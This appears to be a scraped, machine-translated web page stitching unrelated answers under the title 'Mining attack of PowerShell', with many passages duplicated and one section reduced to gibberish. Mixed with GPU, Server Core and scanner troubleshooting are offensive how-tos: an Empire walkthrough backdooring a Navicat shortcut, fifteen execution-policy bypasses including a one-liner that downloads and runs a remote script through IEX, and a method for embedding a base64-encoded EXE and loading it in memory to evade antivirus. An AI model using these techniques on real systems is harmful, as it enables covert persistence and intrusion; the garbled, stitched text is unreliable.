Mining attack of PowerShell
Publish: 2021-04-27 10:00:10
1. 1. Check the background process to see if there is mining and other processes that occupy the graphics card. For example, take up a lot of CPU powershell.exe
2, check the driver, whether compatible, here you can choose to directly unload the driver, go to the official website to check your graphics card, to download the corresponding driver will be much better, I used 360 driver master, install the driver, actually not compatible, all kinds of restart blue screen
3. Use the DX repair tool to repair it
4. I don't think you should make such a low-level mistake, that is to plug the display interface into the motherboard instead of the graphics card...
2, check the driver, whether compatible, here you can choose to directly unload the driver, go to the official website to check your graphics card, to download the corresponding driver will be much better, I used 360 driver master, install the driver, actually not compatible, all kinds of restart blue screen
3. Use the DX repair tool to repair it
4. I don't think you should make such a low-level mistake, that is to plug the display interface into the motherboard instead of the graphics card...
2.
Is a download will be automatically implanted in the computer malicious mining Trojan horse and modify the user DNS configuration, forced to insert advertising Trojan horse tool. Downloading is not recommended
start the script to execute the request URL regularly. The Trojan writer only needs to set the URL to be downloadable, and the user will be attracted
3. 1. Install the backdoor
this time, you need to use the PowerShell attack framework Empire, using Empire / data / mole_ Source / persistence / invoke-backdoorlnk.ps1 this script
- LNK path is the path of LNK to be used, Every time the LNK file is opened, the original application and malicious power shell code behind - enc will be executed
first generate rebound power shell code through Empire
. / Empire enter Empire
input listeners to enter the listening interface, set IP and port
launcher 1 generate power shell code
here we only the code behind - enc
Then execute
to see the above interface, which means that the installation of the back door is completed
when we run the shortcut of Navicat, we can see that powershell.exe has quietly linked empire
this time, you need to use the PowerShell attack framework Empire, using Empire / data / mole_ Source / persistence / invoke-backdoorlnk.ps1 this script
- LNK path is the path of LNK to be used, Every time the LNK file is opened, the original application and malicious power shell code behind - enc will be executed
first generate rebound power shell code through Empire
. / Empire enter Empire
input listeners to enter the listening interface, set IP and port
launcher 1 generate power shell code
here we only the code behind - enc
Then execute
to see the above interface, which means that the installation of the back door is completed
when we run the shortcut of Navicat, we can see that powershell.exe has quietly linked empire
4. By default, PowerShell prevents the execution of PowerShell scripts on Windows systems. This will get in the way of penetration testers, system administrators, and developers... Here I'll bypass the PowerShell execution policy in 15 ways without system administrator privileges
I'm sure a lot of technology is missing (or I don't know at all), but I hope this article will provide a good start for those who need it
what is a PowerShell execution policy
the power shell execution policy is used to determine which types of power shell scripts can be run in the system. By default, it is "restricted.". However, this setting has never been considered a security control. On the contrary, it will hinder the administrator's operation. That's why we have so many ways to get around it. Including some from Microsoft. For more information about the policy settings implemented in PowerShell, the default security control settings. I suggest reading Carlos Perez's blog. He provides a good overview
why bypass the implementation of policies
the reason I hear the most is that people want to automate operations, but there are other reasons why PowerShell is popular among administrators, penetration testers, and users Hackers are so popular:
support Windows
can call windows API
can run commands without writing to disk
can avoid virus detection
is always marked as & quot; Trust & quot;. Is a member of the white list for most applications
many open source penetration testing toolkits have been written
how to view the execution policy
attackers can bypass the "restricted" execution
policy before they can use all the perfect functions of PowerShell. You can see the current configuration through the "execution policy" command of the PowerShell. If you look at it for the first time, its setting may be set to
restricted, as shown in the figure below
PS C: & gt; Get execution policy
it is also worth noting that execution policy can be set at different levels in the system. To view them, use the following list of commands. For more information, please click here to view Microsoft's "set execution policy"
get executionpolicy - list | format table - autosize
experimental environment description
in the following example, I will use a script named runme.ps1, which will contain the following command to write a message to the console:
write host & quot; My voice is my passport, verify me."
when I tried to execute it on a system with a default execution policy, I got the following error:
if your current execution
policy is open, you want to make it more strictly tested, use the following tips, and then run the command "set execution policy
restricted" from the administrator's PowerShell console. OK, then I'll go to BB. Next, I'll use 15 methods to bypass the limitation of the PowerShell execution policy
bypass the PowerShell execution policy
1. Paste the script directly into the interactive PowerShell console
and paste your PowerShell script into an interactive console, as shown in the figure below. However, remember that you will be restricted by the current user's permissions. This is the most basic example. When you have an interactive console, you can easily and quickly run scripts. In addition, this technology does not change the configuration or require writing to disk
2. Echo script and standard input of PowerShell
simple echo script to standard input of PowerShell. This technique does not cause configuration changes or require writing to disk< br />Echo Write-Host " My voice is my passport, verify me." | Powershell.exe - noprofile -
3; type" Command or & quot; Get-Content" Command to read your script from the disk and input it into the standard
PowerShell. This technology will not change the configuration file, but it needs to be written to the disk. However, if you want to try to avoid writing to disk, you can read your scripts from the network
example 1: get content shell command
get content.runme.ps1 | powershell.exe - noprofile -
example 2: type command
type.runme.ps1 | powershell.exe - noprofile -
4. Download a script from the network and execute it through IEX
this technology can be used to download a PowerShell script from the Internet and execute it without writing to disk. It also does not cause any configuration changes. I've seen a lot of creative ways to use it, but recently I've seen it referenced to a good Matt Graeber powerploit blog< br />powershell -nop -c " iex(New-Object Net.WebClient).DownloadString(' http://bit.ly/1kEgbuH' ;)& quot;
5. Using command
is very similar to executing a script by ing and pasting, but it can do without an interactive console. This is a great way to execute simple scripts, but more complex scripts are often prone to errors. This technique does not cause configuration changes or require writing to disk
example 1: complete command
shell - Command & quot; Write-Host ' My voice is my passport, verify me.'& quot;
example 2: short command
shell - C & quot; Write-Host ' My voice is my passport, verify me.'& quot;
6. Using encodecommand
is the same as using & quot; Command" The command is very similar, but it provides a Unicode /
Base64 encoding string for all scripts. Encrypting your script in this way can help you bypass all of the & quot; Command" Errors encountered ring execution. This technology will not cause the configuration file to change or require writing to the
disk. The following example is from posh secmod
example 1: complete command
$command = & quot; Write-Host ' My voice is my passport, verify me.'& quot; $ Bytes = [system. Text. Encoding]:: Unicode. GetBytes ($command) $encodedcommand = [convert]:: tobase64string ($bytes) powershell.exe - encodedcommand $encodedcommand
example 2: use the encoding string
powershell.exe - enc
7. Use the invoke command
I saw this interesting method in obsuresec's blog. This is a typical method executed through the interactive PowerShell console. But the coolest thing is that I can use it to execute commands on a remote system when PowerShell remoting is on. This technique does not cause configuration changes or require writing to disk< br />invoke-command -scriptblock {Write-Host " My voice is my passport, verify me."}
based on the obsuresec blog, the following command can also be used to grab the execution policy from the remote computer and apply it to the local computer
invoke command - computername server01 - scriptblock {get executionpolicy} | set executionpolicy - force
8. Use the invoke expression command
this is another typical way to execute through interactive PowerShell console. This technique does not cause configuration changes or require writing to disk. Here are some common ways to bypass the execution policy through invoke expression
example 1: use the complete command of get content
get content. Runme. PS1 | invoke expression
example 2: use the short command of get content
GC. Runme. PS1 | IEX
9. Use & quot; Bypass" Mark execution policy
this is a good way to bypass execution policy when you execute commands through script files. When you use this tag & quot; Nothing is blocked, no warnings or reminders & quot;. This technique does not cause configuration changes or require writing to disk
powershell.exe - executionpolicy bypass - file. Runme. PS1
10. Use & quot; Unrestricted" Mark execution policy
this is similar to & quot; Bypass" Mark. When you use this tag, it will & quot; Load all configuration files and run all scripts. If you run an unsigned script downloaded from the Internet, it will prompt you for permission;, This technique does not cause configuration changes or require writing to disk
powershell.exe - executionpolicy unrestricted - file. Runme. PS1
11. Use & quot; Remote-Signed" Mark execution policy
to create your script, and then follow the tutorial. Finally, run it with the following command:
powershell.exe - executionpolicy remote signed - file. Runme. PS1
12. Disable executionpolicy by swapping authorization manager
this is really a problem I encountered http://www.nivot.org My idea. The following functions can be executed through an interactive PowerShell. Once the function
is called & quot; AuthorizationManager" It will be replaced by empty. The end result is that the next session is basically not restricted by the execution
policy. However, its changes will be applied to the ration of the session< br />function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_ context",& quot; nonpublic,instance"). getvalue( $executioncontext)).gettype().getfield("_ authorizationManager",& quot; nonpublic,instance"). setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager " Microsoft.PowerShell"))} Disable executionpolicy. Runme. PS1
13. Set the exception policy to process scope
as we can see in the introction, the execution policy can be applied to multi-level. This includes the process you control. With this technique, the execution policy can be set so that the ration of your session is unlimited. In addition, it does not result in configuration changes or need to be written to disk. I first discovered that this technology came from the r007break blog
set executionpolicy bypass - scope process
14. Set exceptionpolicy to currentuser scope by command
this method is similar to the one above. However, this method applies the settings of the current user's environment to the current user's environment by modifying the registry. In addition, it does not result in configuration changes or need to be written to disk. I first discovered that this technology came from the r007break blog
set executionpolicy - scope currentuser - executionpolicy unrestricted
15. In this example, I show how to change the execution policy of the current user's environment by modifying the registry key< br />HKEY_ CURRENT_ USER\ Software\ MicrosoftPowerShell\ 1\ ShellIds\ Microsoft. PowerShell
summary
I think the theme here is: the execution policy used is not necessarily the developer, administrator, or administrator. Microsoft has never intended to make it
I'm sure a lot of technology is missing (or I don't know at all), but I hope this article will provide a good start for those who need it
what is a PowerShell execution policy
the power shell execution policy is used to determine which types of power shell scripts can be run in the system. By default, it is "restricted.". However, this setting has never been considered a security control. On the contrary, it will hinder the administrator's operation. That's why we have so many ways to get around it. Including some from Microsoft. For more information about the policy settings implemented in PowerShell, the default security control settings. I suggest reading Carlos Perez's blog. He provides a good overview
why bypass the implementation of policies
the reason I hear the most is that people want to automate operations, but there are other reasons why PowerShell is popular among administrators, penetration testers, and users Hackers are so popular:
support Windows
can call windows API
can run commands without writing to disk
can avoid virus detection
is always marked as & quot; Trust & quot;. Is a member of the white list for most applications
many open source penetration testing toolkits have been written
how to view the execution policy
attackers can bypass the "restricted" execution
policy before they can use all the perfect functions of PowerShell. You can see the current configuration through the "execution policy" command of the PowerShell. If you look at it for the first time, its setting may be set to
restricted, as shown in the figure below
PS C: & gt; Get execution policy
it is also worth noting that execution policy can be set at different levels in the system. To view them, use the following list of commands. For more information, please click here to view Microsoft's "set execution policy"
get executionpolicy - list | format table - autosize
experimental environment description
in the following example, I will use a script named runme.ps1, which will contain the following command to write a message to the console:
write host & quot; My voice is my passport, verify me."
when I tried to execute it on a system with a default execution policy, I got the following error:
if your current execution
policy is open, you want to make it more strictly tested, use the following tips, and then run the command "set execution policy
restricted" from the administrator's PowerShell console. OK, then I'll go to BB. Next, I'll use 15 methods to bypass the limitation of the PowerShell execution policy
bypass the PowerShell execution policy
1. Paste the script directly into the interactive PowerShell console
and paste your PowerShell script into an interactive console, as shown in the figure below. However, remember that you will be restricted by the current user's permissions. This is the most basic example. When you have an interactive console, you can easily and quickly run scripts. In addition, this technology does not change the configuration or require writing to disk
2. Echo script and standard input of PowerShell
simple echo script to standard input of PowerShell. This technique does not cause configuration changes or require writing to disk< br />Echo Write-Host " My voice is my passport, verify me." | Powershell.exe - noprofile -
3; type" Command or & quot; Get-Content" Command to read your script from the disk and input it into the standard
PowerShell. This technology will not change the configuration file, but it needs to be written to the disk. However, if you want to try to avoid writing to disk, you can read your scripts from the network
example 1: get content shell command
get content.runme.ps1 | powershell.exe - noprofile -
example 2: type command
type.runme.ps1 | powershell.exe - noprofile -
4. Download a script from the network and execute it through IEX
this technology can be used to download a PowerShell script from the Internet and execute it without writing to disk. It also does not cause any configuration changes. I've seen a lot of creative ways to use it, but recently I've seen it referenced to a good Matt Graeber powerploit blog< br />powershell -nop -c " iex(New-Object Net.WebClient).DownloadString(' http://bit.ly/1kEgbuH' ;)& quot;
5. Using command
is very similar to executing a script by ing and pasting, but it can do without an interactive console. This is a great way to execute simple scripts, but more complex scripts are often prone to errors. This technique does not cause configuration changes or require writing to disk
example 1: complete command
shell - Command & quot; Write-Host ' My voice is my passport, verify me.'& quot;
example 2: short command
shell - C & quot; Write-Host ' My voice is my passport, verify me.'& quot;
6. Using encodecommand
is the same as using & quot; Command" The command is very similar, but it provides a Unicode /
Base64 encoding string for all scripts. Encrypting your script in this way can help you bypass all of the & quot; Command" Errors encountered ring execution. This technology will not cause the configuration file to change or require writing to the
disk. The following example is from posh secmod
example 1: complete command
$command = & quot; Write-Host ' My voice is my passport, verify me.'& quot; $ Bytes = [system. Text. Encoding]:: Unicode. GetBytes ($command) $encodedcommand = [convert]:: tobase64string ($bytes) powershell.exe - encodedcommand $encodedcommand
example 2: use the encoding string
powershell.exe - enc
7. Use the invoke command
I saw this interesting method in obsuresec's blog. This is a typical method executed through the interactive PowerShell console. But the coolest thing is that I can use it to execute commands on a remote system when PowerShell remoting is on. This technique does not cause configuration changes or require writing to disk< br />invoke-command -scriptblock {Write-Host " My voice is my passport, verify me."}
based on the obsuresec blog, the following command can also be used to grab the execution policy from the remote computer and apply it to the local computer
invoke command - computername server01 - scriptblock {get executionpolicy} | set executionpolicy - force
8. Use the invoke expression command
this is another typical way to execute through interactive PowerShell console. This technique does not cause configuration changes or require writing to disk. Here are some common ways to bypass the execution policy through invoke expression
example 1: use the complete command of get content
get content. Runme. PS1 | invoke expression
example 2: use the short command of get content
GC. Runme. PS1 | IEX
9. Use & quot; Bypass" Mark execution policy
this is a good way to bypass execution policy when you execute commands through script files. When you use this tag & quot; Nothing is blocked, no warnings or reminders & quot;. This technique does not cause configuration changes or require writing to disk
powershell.exe - executionpolicy bypass - file. Runme. PS1
10. Use & quot; Unrestricted" Mark execution policy
this is similar to & quot; Bypass" Mark. When you use this tag, it will & quot; Load all configuration files and run all scripts. If you run an unsigned script downloaded from the Internet, it will prompt you for permission;, This technique does not cause configuration changes or require writing to disk
powershell.exe - executionpolicy unrestricted - file. Runme. PS1
11. Use & quot; Remote-Signed" Mark execution policy
to create your script, and then follow the tutorial. Finally, run it with the following command:
powershell.exe - executionpolicy remote signed - file. Runme. PS1
12. Disable executionpolicy by swapping authorization manager
this is really a problem I encountered http://www.nivot.org My idea. The following functions can be executed through an interactive PowerShell. Once the function
is called & quot; AuthorizationManager" It will be replaced by empty. The end result is that the next session is basically not restricted by the execution
policy. However, its changes will be applied to the ration of the session< br />function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_ context",& quot; nonpublic,instance"). getvalue( $executioncontext)).gettype().getfield("_ authorizationManager",& quot; nonpublic,instance"). setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager " Microsoft.PowerShell"))} Disable executionpolicy. Runme. PS1
13. Set the exception policy to process scope
as we can see in the introction, the execution policy can be applied to multi-level. This includes the process you control. With this technique, the execution policy can be set so that the ration of your session is unlimited. In addition, it does not result in configuration changes or need to be written to disk. I first discovered that this technology came from the r007break blog
set executionpolicy bypass - scope process
14. Set exceptionpolicy to currentuser scope by command
this method is similar to the one above. However, this method applies the settings of the current user's environment to the current user's environment by modifying the registry. In addition, it does not result in configuration changes or need to be written to disk. I first discovered that this technology came from the r007break blog
set executionpolicy - scope currentuser - executionpolicy unrestricted
15. In this example, I show how to change the execution policy of the current user's environment by modifying the registry key< br />HKEY_ CURRENT_ USER\ Software\ MicrosoftPowerShell\ 1\ ShellIds\ Microsoft. PowerShell
summary
I think the theme here is: the execution policy used is not necessarily the developer, administrator, or administrator. Microsoft has never intended to make it
5. Server core is a minimal server installation option introced on Windows Server 2008 system. The function of server core is to provide a low maintenance server environment with limited executable functions for specific services, which brings us the advantages of improving the stability of the server, recing the amount of software maintenance, recing the risk of being attacked Less space occupancy and other benefits
in Windows Server 2012, administrators can switch directly between the server core version and GUI version, and do not need to reload the system. It simplifies the complexity of the administrator to select the interface version of the operating system and the difficulty of switching in the future. These operations only need to be completed by the PowerShell
1. First of all, take a look at the operation of switching to the server core in the GUI interface. Open the PowerShell and execute the unified windows feature server GUI MGMT infra restart. After the command is completed, the service will be automatically restarted, that is, switching to the server core interface
2. After the restart, log in to the server and execute sconfig on the command line to enter the server configuration, Here, the server can be configured to perform operations such as modifying the computer name, joining the domain and setting the network. You can also run mmc.exe and use any snap in
3. Next, exit to the command line, enter the power shell, and prepare to restore the GUI interface.
in Windows Server 2012, administrators can switch directly between the server core version and GUI version, and do not need to reload the system. It simplifies the complexity of the administrator to select the interface version of the operating system and the difficulty of switching in the future. These operations only need to be completed by the PowerShell
1. First of all, take a look at the operation of switching to the server core in the GUI interface. Open the PowerShell and execute the unified windows feature server GUI MGMT infra restart. After the command is completed, the service will be automatically restarted, that is, switching to the server core interface
2. After the restart, log in to the server and execute sconfig on the command line to enter the server configuration, Here, the server can be configured to perform operations such as modifying the computer name, joining the domain and setting the network. You can also run mmc.exe and use any snap in
3. Next, exit to the command line, enter the power shell, and prepare to restore the GUI interface.
6. 1.1. 36828277; 3682827; 3682827; ;base64 325344; 3072111;
; rororororowbrowbrowbrowbrowbrowbrowbrowbrowbrowbrowbrowbrowbrowbrowbrowFile]::ReadAllBytes($FilePath);< br />}
; rororororowbrowbrowbrowbrowbrowbrowbrowbrowbrowbrowbrowbrowbrowbrowbrowFile]::ReadAllBytes($FilePath);< br />}
7. The scanned files cannot be transferred to the shared folder in the computer for the following reasons: 1. Check the internal settings of the scanner again, and check whether the folder is checked when you click save
2. Check whether the name of the shared folder on the computer has been changed maliciously. Solution: correct the shared folder name
3. Use anti-virus software to scan the whole disk to see if it is infected by virus or attacked by hackers. Solution: restart the computer and scan again
4. Check whether the computer scanner has been deleted maliciously. The solution is to restart the computer and re install the scanning software.
2. Check whether the name of the shared folder on the computer has been changed maliciously. Solution: correct the shared folder name
3. Use anti-virus software to scan the whole disk to see if it is infected by virus or attacked by hackers. Solution: restart the computer and scan again
4. Check whether the computer scanner has been deleted maliciously. The solution is to restart the computer and re install the scanning software.
8. I'm trying to solve a problem, that is, only pure PowerShell script is used as the attack load in the client attack. There are many advantages to running malicious code with PowerShell, including:
1. There is no need to install anything else on the target
2. Powerful engine (such as calling. Net code directly)
3. You can use Base64 encoding commands to confuse malicious commands, so that malicious commands are not easy to be found. This is also a way to avoid using special characters, especially in an advanced attack involving multiple steps and requiring separation of different attack loads
4. You can use invoke expression to interpret a string as a shell
command. From the perspective of penetration testing, this avoids writing complex scripts on the target disk. For example, you can download additional complex scripts using PowerShell, and then interpret and execute the scripts downloaded into memory by calling
invoke expression. This process can also avoid the killing of anti-virus software
we want to run some fairly complex functions on the target, which are often part of the EXE file. I don't want to put a binary file directly on the target because it might trigger the anti-virus mechanism. So I want to put it in a shell script, but I don't want to rewrite the whole shell script
in the end, I came up with a solution
embed the binary file into the shell script and run it directly without writing it to disk<
the following steps are demonstrated:
1. Base64 encoding binary files
the following functions can be used:
function convert binarytostring {
[cmdletbinding()] param (
[string] $filepath
)
try {
$bytearray = [system. Io. File]:: readallbytes ($filepath)< br />
}
catch {
throw " Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";< br />
}
if ($ByteArray) {
$Base64String = [System.Convert]::ToBase64String($ByteArray);< br />
}
else {
throw '$ ByteArray is $null.';< br />
}
Write-Output -InputObject $Base64String;
}
2. Create a new script as follows
1. Use the method in the previous step to convert the EXE file to a string
2. Prepare the invoke reflective peinjection (part of the powersploit project)
3. Convert string to byte array
4. Call invoke reflective peinjection
therefore, a binary file is just a string in a PowerShell script. After decoding the string into a binary array, you can call invoke reflective peinjection to run directly in memory
finally, it looks like this:
# Base64 encoded binary file
$inputstring = &# 39&# 39;
function invoke reflective peinjection
{
...
...
}
#: convert binary string to byte array
$pebytes = [system. Convert]:: frombase64string ($inputstring)
#: run exe in memory
invoke reflective peinjection - pebytes $pebytes - execa rgs " Arg1 Arg2 Arg3 Arg4"
now you can run the script on the target:
shell - executionpolicy bypass - file payload.ps1
depending on the embedded binary files, The following errors may occur:
PE platform doesn't match the architecture of the process it is being loaded in (32 / 64bit)
to solve this problem, you only need to run 32-bit PowerShell
here is an example of how I embed plink.exe into payload.ps1:
1. There is no need to install anything else on the target
2. Powerful engine (such as calling. Net code directly)
3. You can use Base64 encoding commands to confuse malicious commands, so that malicious commands are not easy to be found. This is also a way to avoid using special characters, especially in an advanced attack involving multiple steps and requiring separation of different attack loads
4. You can use invoke expression to interpret a string as a shell
command. From the perspective of penetration testing, this avoids writing complex scripts on the target disk. For example, you can download additional complex scripts using PowerShell, and then interpret and execute the scripts downloaded into memory by calling
invoke expression. This process can also avoid the killing of anti-virus software
we want to run some fairly complex functions on the target, which are often part of the EXE file. I don't want to put a binary file directly on the target because it might trigger the anti-virus mechanism. So I want to put it in a shell script, but I don't want to rewrite the whole shell script
in the end, I came up with a solution
embed the binary file into the shell script and run it directly without writing it to disk<
the following steps are demonstrated:
1. Base64 encoding binary files
the following functions can be used:
function convert binarytostring {
[cmdletbinding()] param (
[string] $filepath
)
try {
$bytearray = [system. Io. File]:: readallbytes ($filepath)< br />
}
catch {
throw " Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";< br />
}
if ($ByteArray) {
$Base64String = [System.Convert]::ToBase64String($ByteArray);< br />
}
else {
throw '$ ByteArray is $null.';< br />
}
Write-Output -InputObject $Base64String;
}
2. Create a new script as follows
1. Use the method in the previous step to convert the EXE file to a string
2. Prepare the invoke reflective peinjection (part of the powersploit project)
3. Convert string to byte array
4. Call invoke reflective peinjection
therefore, a binary file is just a string in a PowerShell script. After decoding the string into a binary array, you can call invoke reflective peinjection to run directly in memory
finally, it looks like this:
# Base64 encoded binary file
$inputstring = &# 39&# 39;
function invoke reflective peinjection
{
...
...
}
#: convert binary string to byte array
$pebytes = [system. Convert]:: frombase64string ($inputstring)
#: run exe in memory
invoke reflective peinjection - pebytes $pebytes - execa rgs " Arg1 Arg2 Arg3 Arg4"
now you can run the script on the target:
shell - executionpolicy bypass - file payload.ps1
depending on the embedded binary files, The following errors may occur:
PE platform doesn't match the architecture of the process it is being loaded in (32 / 64bit)
to solve this problem, you only need to run 32-bit PowerShell
here is an example of how I embed plink.exe into payload.ps1:
Hot content